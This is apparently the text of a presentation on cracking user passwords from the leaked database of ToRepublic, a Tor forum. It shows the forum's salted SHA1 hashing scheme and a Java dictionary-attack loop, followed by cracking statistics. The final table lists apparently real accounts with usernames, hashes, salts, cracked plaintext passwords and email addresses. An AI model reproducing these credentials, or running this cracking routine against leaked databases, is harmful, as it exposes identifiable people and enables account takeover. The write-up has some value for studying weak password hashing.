This presentation is shared on my github account http://bartoszzychal.github.io/Breaking-ToRepublic-s-user-s-password/
ToRepublic is a forum in deep web (TOR).
Forum's database and source code were leaked
...and are here: https://github.com/ToRepublic/ToRepublic
$form_password_hash = forum_hash($form_password, $salt);
function: forum_hash()
function forum_hash($str, $salt){
$return = ($hook = get_hook('fn_forum_hash_start')) ? eval($hook) : null;
if ($return != null)
return $return;
return sha1($salt.sha1($str));
}
SHA1(SALT+SHA1(password))
In cryptography, a salt is random data that is used as an additional input to a one-way function that "hashes" a password or passphrase.
I used dictionary method
while (dictionary.ready() && existsNotBreakHash) {
String word = dictionary.readWord();
String sha1 = DigestUtils.sha1Hex(word);
users.parallelStream().forEach((user)->{
String encodeSaltSha1 = DigestUtils.sha1Hex(user.getSalt().concat(sha1));
if (user.getPassword().equals(encodeSaltSha1)) {
database.updateUserData(user, word);
}
});
}
Apache Commons Codec is used to generate the digests.
Dictionary: 4GB (320*106 words)
Hashes to crack: ~2000
Hashes cracked: 103
Digests generated: 40*109
Time: 40h
CPU: Intel® Core™ i7-4810MQ 2.8 GHz
CPU usage: 100%
| user_id | username | password | salt | dpassword | |
|---|---|---|---|---|---|
| 30 | inf3c7ed | ee880c4bcdcaf761a6358844f5891ec040a4cf25 | -QHsr`HPFAhs | q1w2e3r4t5y6u7i8 | inf3c7ed@safe-mail.net |
| 95 | luigii | 93f0504a5fa819296800b89e86fea421630e3eca | Do1Z%Dz2=.DV | opt1muspr1me | luigii@safe-mail.net |
| 820 | albus3 | 572d1ed5d5ff6d6d5867fec616d90097e21b6046 | qrM{xp*2uG5$ | beutyandthebeast | albus3@safe-mail.net |